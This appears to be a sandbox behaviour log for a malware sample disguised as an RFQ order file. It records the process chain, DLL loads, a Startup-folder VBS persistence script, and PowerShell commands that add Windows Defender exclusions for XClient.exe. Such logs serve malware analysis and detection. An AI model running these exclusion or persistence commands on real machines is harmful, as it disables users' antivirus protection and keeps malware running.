File read: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exhilaratingly.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8088 -s 992
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: wsock32.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: drprov.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winsta.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntlanman.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davclnt.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davhlpr.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cscapi.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: browcli.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: wsock32.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dwrite.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msvcp140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windowscodecs.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rstrtmgr.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: winmm.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
